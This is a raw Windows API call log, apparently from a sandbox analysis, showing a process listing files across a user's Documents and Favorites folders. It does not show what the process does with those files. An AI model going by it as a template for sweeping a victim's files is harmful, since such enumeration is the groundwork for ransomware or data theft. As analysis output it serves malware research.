ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0227.779] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 0 [0227.779] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.779] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.779] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.779] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\") returned="X0h6NwRPaRX5m\\" [0227.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0227.780] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.780] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.780] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.780] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.780] PathFindFileNameW (pszPath="") returned="" [0227.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\X0h6NwRPaRX5m\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.782] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ede00 | out: hHeap=0x630000) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3544ca0, ftCreationTime.dwHighDateTime=0x1d5e60c, ftLastAccessTime.dwLowDateTime=0x22fedc50, ftLastAccessTime.dwHighDateTime=0x1d5e5ef, ftLastWriteTime.dwLowDateTime=0x22fedc50, ftLastWriteTime.dwHighDateTime=0x1d5e5ef, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c797c20, ftCreationTime.dwHighDateTime=0x1d5d95d, ftLastAccessTime.dwLowDateTime=0x6ebd9830, ftLastAccessTime.dwHighDateTime=0x1d5e549, ftLastWriteTime.dwLowDateTime=0x6ebd9830, ftLastWriteTime.dwHighDateTime=0x1d5e549, nFileSizeHigh=0x0, nFileSizeLow=0x51a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-I-Xy5gtCCf2anzAp.ods", cAlternateFileName="-I-XY5~1.ODS")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6a05980, ftCreationTime.dwHighDateTime=0x1d5e36a, ftLastAccessTime.dwLowDateTime=0xe02a4a10, ftLastAccessTime.dwHighDateTime=0x1d5db42, ftLastWriteTime.dwLowDateTime=0xe02a4a10, ftLastWriteTime.dwHighDateTime=0x1d5db42, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eBkpfXutqqrq6h", cAlternateFileName="EBKPFX~1")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43ffbf90, ftCreationTime.dwHighDateTime=0x1d5e221, ftLastAccessTime.dwLowDateTime=0x9524bce0, ftLastAccessTime.dwHighDateTime=0x1d5e14a, ftLastWriteTime.dwLowDateTime=0x9524bce0, ftLastWriteTime.dwHighDateTime=0x1d5e14a, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ffz SFjC.ots", cAlternateFileName="FFZSFJ~1.OTS")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57debbe0, ftCreationTime.dwHighDateTime=0x1d5e0f2, ftLastAccessTime.dwLowDateTime=0xe5d73030, ftLastAccessTime.dwHighDateTime=0x1d5e7f0, ftLastWriteTime.dwLowDateTime=0xe5d73030, ftLastWriteTime.dwHighDateTime=0x1d5e7f0, nFileSizeHigh=0x0, nFileSizeLow=0x1298b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FHmONqV v2JkG3.ots", cAlternateFileName="FHMONQ~1.OTS")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbee6ae0, ftCreationTime.dwHighDateTime=0x1d5da2c, ftLastAccessTime.dwLowDateTime=0x6c4c5470, ftLastAccessTime.dwHighDateTime=0x1d5d8f0, ftLastWriteTime.dwLowDateTime=0x6c4c5470, ftLastWriteTime.dwHighDateTime=0x1d5d8f0, nFileSizeHigh=0x0, nFileSizeLow=0x19a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="grljDT8nx55.pps", cAlternateFileName="GRLJDT~1.PPS")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43067f80, ftCreationTime.dwHighDateTime=0x1d5e563, ftLastAccessTime.dwLowDateTime=0x36239610, ftLastAccessTime.dwHighDateTime=0x1d5dd7d, ftLastWriteTime.dwLowDateTime=0x36239610, ftLastWriteTime.dwHighDateTime=0x1d5dd7d, nFileSizeHigh=0x0, nFileSizeLow=0x18a9e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HHueX3S0ibdFq.odt", cAlternateFileName="HHUEX3~1.ODT")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725af590, ftCreationTime.dwHighDateTime=0x1d5d898, ftLastAccessTime.dwLowDateTime=0x1614b2b0, ftLastAccessTime.dwHighDateTime=0x1d5e1f5, ftLastWriteTime.dwLowDateTime=0x1614b2b0, ftLastWriteTime.dwHighDateTime=0x1d5e1f5, nFileSizeHigh=0x0, nFileSizeLow=0x4689, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p2Sojk8t7gJih823M5.pptx", cAlternateFileName="P2SOJK~1.PPT")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x488a5e80, ftCreationTime.dwHighDateTime=0x1d5dad3, ftLastAccessTime.dwLowDateTime=0x32b8f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x32b8f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3pat", cAlternateFileName="")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6470fc10, ftCreationTime.dwHighDateTime=0x1d5d968, ftLastAccessTime.dwLowDateTime=0x2a2660d0, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x2a2660d0, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0xc377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UUwhrC FoVL4PsJ.ppt", cAlternateFileName="UUWHRC~1.PPT")) returned 1 [0227.782] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6470fc10, ftCreationTime.dwHighDateTime=0x1d5d968, ftLastAccessTime.dwLowDateTime=0x2a2660d0, ftLastAccessTime.dwHighDateTime=0x1d5dabd, ftLastWriteTime.dwLowDateTime=0x2a2660d0, ftLastWriteTime.dwHighDateTime=0x1d5dabd, nFileSizeHigh=0x0, nFileSizeLow=0xc377, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UUwhrC FoVL4PsJ.ppt", cAlternateFileName="UUWHRC~1.PPT")) returned 0 [0227.782] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0227.783] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0227.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0227.783] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.783] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.783] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.784] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.784] PathFindFileNameW (pszPath="") returned="" [0227.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711968 | out: hHeap=0x630000) returned 1 [0227.784] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.784] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0227.784] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0227.784] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0227.784] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0227.784] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0227.784] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0227.784] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0227.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0227.785] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.785] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.785] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31eda80 | out: hHeap=0x630000) returned 1 [0227.785] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.785] PathFindFileNameW (pszPath="") returned="" [0227.785] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0227.787] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0227.787] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.788] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0227.788] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0227.789] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0227.789] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0227.789] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.789] PathFindFileNameW (pszPath="") returned="" [0227.789] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0227.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0227.791] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0227.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0227.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0227.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0227.792] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0227.792] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.793] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0227.793] PathFindFileNameW 